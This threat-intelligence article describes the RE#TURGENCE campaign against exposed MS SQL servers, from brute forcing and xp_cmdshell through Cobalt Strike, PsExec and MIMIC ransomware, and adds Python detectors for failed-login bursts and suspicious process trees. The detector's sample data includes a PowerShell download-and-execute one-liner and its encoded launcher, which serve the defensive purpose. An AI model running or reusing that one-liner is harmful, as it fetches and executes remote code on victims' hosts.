RE#TURGENCE: Ongoing Threat Campaign Targeting MS SQL Servers with Financial Motivations

A recently identified campaign, tracked as RE#TURGENCE, targets Microsoft SQL Server instances that are exposed to the internet and protected by weak credentials. This article summarizes the tactics used by the financially motivated, Turkish-speaking threat actors behind it, the regions they target, and the end goals of the campaign. It then walks through the attack chain, from initial access to ransomware deployment, and the consequences for affected organizations, and closes with concrete recommendations for keeping critical database servers out of reach of attacks like RE#TURGENCE.

Target and Motivations

The RE#TURGENCE campaign has been attributed to Turkish-speaking threat actors driven by financial gain. Their targeting is concentrated on the United States, the European Union, and Latin America. That choice of regions reflects where the expected payouts are largest and where internet-exposed MS SQL servers are plentiful; the actors are opportunistic, going after any reachable instance with a guessable administrator password rather than specific organizations.

Tactics and End Goals

The campaign serves two objectives. The first is short-term monetization: once a host is compromised, the actors sell access to it to other threat actors or criminal groups, acting as initial access brokers. The second is the eventual deployment of ransomware on the compromised servers, which carries far more severe consequences for the affected organizations.

Brute Forcing and Execution

Initial access is not an exploit of a software vulnerability but plain password guessing: the actors brute force the credentials of MS SQL Server administrator accounts, most commonly the built-in sa login, on instances that are reachable from the internet. Once authenticated with sysadmin rights, they turn on the xp_cmdshell extended stored procedure, which SQL Server disables by default, and use it to run operating-system commands. Two points follow for defenders: strong, unique passwords (and, where possible, disabling or renaming sa and preferring Windows authentication) shut the door on the brute-force stage, and a burst of failed logins from a single source in the SQL Server error log is the earliest observable sign of this campaign.
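The following is an added detection example written for this article; it is not code from the original page or from the analysts who described the campaign. It parses lines in the shape of SQL Server ERRORLOG "Login failed" (error 18456) messages and flags any client address that accumulates more than a threshold of failures inside a sliding time window. The log lines, addresses and thresholds are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed lines in the shape of SQL Server ERRORLOG "Login failed" messages
# (error 18456). Not real data; the client addresses are private/documentation ranges.
SAMPLE_ERRORLOG = """\
2024-01-05 10:12:33.45 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2024-01-05 10:12:34.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2024-01-05 10:12:34.72 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 203.0.113.5]
2024-01-05 10:12:35.30 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2024-01-05 10:12:36.01 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2024-01-05 10:12:36.88 Logon       Login failed for user 'sqladmin'. Reason: Could not find a login matching the name provided. [CLIENT: 203.0.113.5]
2024-01-05 10:40:02.00 Logon       Login failed for user 'reporting'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.7]
2024-01-05 11:15:45.12 Logon       Login failed for user 'reporting'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.7]
"""

# Timestamp, login name and client address from a "Login failed" line.
LOGIN_FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_failed_logins(text):
    """Return (timestamp, user, client) tuples for every failed-login line."""
    events = []
    for line in text.splitlines():
        m = LOGIN_FAILED.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S.%f")
        events.append((ts, m.group("user"), m.group("client")))
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Flag each client that reaches `threshold` failures within any `window`.

    A two-pointer sliding window over the time-sorted attempts of each client
    gives the densest burst; slow, spread-out failures (a forgotten service
    password) stay below the threshold and are not reported.
    """
    by_client = defaultdict(list)
    for ts, user, client in sorted(events):
        by_client[client].append((ts, user))

    alerts = []
    for client, attempts in by_client.items():
        best, start = 0, 0
        for end in range(len(attempts)):
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts.append({
                "client": client,
                "max_in_window": best,
                "total_failures": len(attempts),
                "users": sorted({u for _, u in attempts}),
                "first": attempts[0][0],
                "last": attempts[-1][0],
            })
    return alerts


def run_detection(text=SAMPLE_ERRORLOG):
    return detect_bruteforce(parse_failed_logins(text))


if __name__ == "__main__":
    for alert in run_detection():
        print(f"{alert['client']}: {alert['max_in_window']} failures in one window, "
              f"logins tried {alert['users']}, {alert['first']} .. {alert['last']}")
```

The sample contains six failures from one address in under four seconds across three different login names, which is the password-spraying shape of this campaign, and two failures from an internal host 35 minutes apart, which is not. On a real instance, point `run_detection` at the ERRORLOG file (and make sure failed-login auditing is enabled in the server properties, or there is nothing to parse).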

Command Execution

With xp_cmdshell enabled, the attackers ran commands on the compromised server directly from the database engine. Because xp_cmdshell hands each command to a shell launched by the SQL Server service, those commands show up as cmd.exe children of the sqlservr.exe process, which is a strong and easily monitored indicator, since a database engine has no routine reason to spawn shells. This gave the actors a foothold on the host from which to stage further tooling and move laterally across the network.

Obfuscated PowerShell Script

The next stage was fetched and launched by a semi-obfuscated PowerShell script. The obfuscation is aimed at defeating string-based signatures rather than at hiding the behaviour: once the script runs, PowerShell script block logging records the decoded commands, so hosts with that logging enabled still capture what the script did. Analysis of the script shows deliberate misdirection and evasion rather than anything novel, but it is enough to slip past defenses that rely on matching known strings.

Interactive Code Execution

For post-exploitation the actors relied on Cobalt Strike as their primary command-and-control and code-execution framework. Cobalt Strike's beacons give an operator an interactive channel into the compromised host, with built-in evasion features and options for persistence. Its use here signals a hands-on-keyboard operation in which the actors adapt in real time to what they find on each server, rather than a fully automated, fire-and-forget intrusion.

Lateral Movement with PsExec

To move laterally and take control of additional systems, the attackers used PsExec. PsExec is a legitimate Sysinternals administration tool that executes programs on remote Windows hosts; on each target it copies and starts a temporary service (PSEXESVC) that runs the requested command. Its abuse here is a reminder that strong network segmentation and access controls should limit remote execution with such tools to the administrative accounts and hosts that genuinely need it, and that a PSEXESVC service appearing on a server nobody is administering deserves a look.
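The command-execution, obfuscated-PowerShell and PsExec stages above share one detection surface, process-creation telemetry, so here is a single added example that covers all three. It is written for this article and is not code from the original page or from the campaign's analysts. It runs over constructed records in the shape of Sysmon Event ID 1 fields and flags shells whose ancestry includes sqlservr.exe, PSEXESVC.exe and its children, and PowerShell launched with an encoded command, which it decodes. The hostnames, PIDs, paths and the stage-two URL are all assumptions made up for the example.

```python
import base64

# The stage-two script and its -EncodedCommand form are constructed for this example.
# PowerShell's -EncodedCommand takes the base64 of the UTF-16LE script text.
STAGE2_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage2.ps1')"
ENCODED_LAUNCHER = base64.b64encode(STAGE2_SCRIPT.encode("utf-16le")).decode("ascii")

SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"

# Constructed process-creation records (Sysmon Event ID 1 style). Not real telemetry.
SAMPLE_EVENTS = [
    {"host": "sql01", "pid": 1200, "ppid": 800, "image": SQLSERVR,
     "cmdline": '"' + SQLSERVR + '" -sMSSQLSERVER'},
    {"host": "sql01", "pid": 4410, "ppid": 1200, "image": CMD,          # xp_cmdshell
     "cmdline": "cmd.exe /c powershell -nop -w hidden -enc " + ENCODED_LAUNCHER},
    {"host": "sql01", "pid": 4412, "ppid": 4410, "image": POWERSHELL,   # stage-two loader
     "cmdline": "powershell -nop -w hidden -enc " + ENCODED_LAUNCHER},
    {"host": "fs02", "pid": 3300, "ppid": 600, "image": r"C:\Windows\PSEXESVC.exe",
     "cmdline": r"C:\Windows\PSEXESVC.exe"},                            # PsExec service
    {"host": "fs02", "pid": 3320, "ppid": 3300, "image": CMD, "cmdline": "cmd.exe"},
    {"host": "web03", "pid": 2100, "ppid": 700, "image": POWERSHELL,    # benign admin job
     "cmdline": r"powershell -File C:\scripts\backup.ps1"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
PS_HOSTS = {"powershell.exe", "pwsh.exe"}
ENCODED_FLAGS = {"e", "ec", "enc", "encodedcommand"}  # prefixes PowerShell accepts


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line uses -EncodedCommand, else None."""
    tokens = cmdline.split()
    for i in range(len(tokens) - 1):
        if tokens[i].lower().lstrip("-/") in ENCODED_FLAGS:
            try:
                raw = base64.b64decode(tokens[i + 1].strip("\"'"), validate=True)
                return raw.decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def ancestors(event, by_pid, max_depth=8):
    """Image names of the parent chain, nearest first; depth-limited against PID reuse loops."""
    chain, cur = [], event
    for _ in range(max_depth):
        cur = by_pid.get((cur["host"], cur["ppid"]))
        if cur is None:
            break
        chain.append(image_name(cur["image"]))
    return chain


def find_suspicious(events):
    by_pid = {(e["host"], e["pid"]): e for e in events}
    findings = []
    for e in events:
        name = image_name(e["image"])
        lineage = ancestors(e, by_pid)
        base = {"host": e["host"], "pid": e["pid"], "image": name}
        # Any shell at any depth under the database engine: xp_cmdshell in use.
        if name in SHELLS and "sqlservr.exe" in lineage:
            findings.append({**base, "rule": "shell_under_sqlservr"})
        # PsExec drops and starts PSEXESVC on the target; its children are the remote command.
        if name == "psexesvc.exe":
            findings.append({**base, "rule": "psexec_service_started"})
        elif lineage and lineage[0] == "psexesvc.exe":
            findings.append({**base, "rule": "psexec_remote_command"})
        # Encoded PowerShell: surface the decoded script for the analyst.
        if name in PS_HOSTS:
            decoded = decode_encoded_command(e["cmdline"])
            if decoded is not None:
                findings.append({**base, "rule": "encoded_powershell", "decoded": decoded})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_EVENTS):
        print(f"{f['host']} pid {f['pid']} {f['image']}: {f['rule']}"
              + (f" -> {f['decoded']}" if "decoded" in f else ""))
```

The benign PowerShell job on web03 produces nothing, the sqlservr.exe chain on sql01 produces a finding for both the cmd.exe and the powershell.exe beneath it (plus the decoded download-and-execute one-liner), and fs02 shows the two-part PsExec signature. In production the records would come from Sysmon or an EDR rather than a list, and the sqlservr.exe rule in particular should be tuned against any maintenance jobs that legitimately use xp_cmdshell before it is turned into an alert.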

Historic Context of MIMIC Ransomware

MIMIC ransomware was first publicly reported in January 2023 and was adopted quickly by criminal operators. One of its notable traits is that it deletes the binaries it used during encryption once the job is done; that does not change whether the data is recoverable (which comes down to backups and the strength of the encryption), but it removes evidence that responders would otherwise use to reconstruct the attack and attribute it. RE#TURGENCE's use of MIMIC shows how readily established ransomware is folded into opportunistic access campaigns, and why preparation for recovery has to happen before the intrusion.

Security Recommendations

Given how RE#TURGENCE gains its foothold, the single most effective measure is not leaving critical servers exposed to the internet: SQL Server should not be reachable on its listening port from untrusted networks at all. Beyond that, apply the basics that this campaign exploits the absence of: enforce strong, unique passwords for SQL logins and disable or rename the sa account, preferring Windows authentication where possible; leave xp_cmdshell disabled unless a documented job needs it, and alert on it being enabled; patch the engine and the host regularly; segment the network so a database server cannot freely reach the rest of the estate; and monitor failed-login bursts and shells spawned by sqlservr.exe, which together cover the first two stages of this attack chain.

RE#TURGENCE is an ongoing campaign that poses a serious risk to any organization running an internet-reachable MS SQL server with guessable administrator credentials. The financially motivated actors behind it combine brute forcing, xp_cmdshell command execution, obfuscated PowerShell loaders, interactive Cobalt Strike operations, and legitimate tools such as PsExec, ending in access sales or MIMIC ransomware. The recommendations above close the entry point and give defenders visibility into the stages that follow it; staying vigilant and applying them proactively is what keeps a campaign like this from becoming an incident.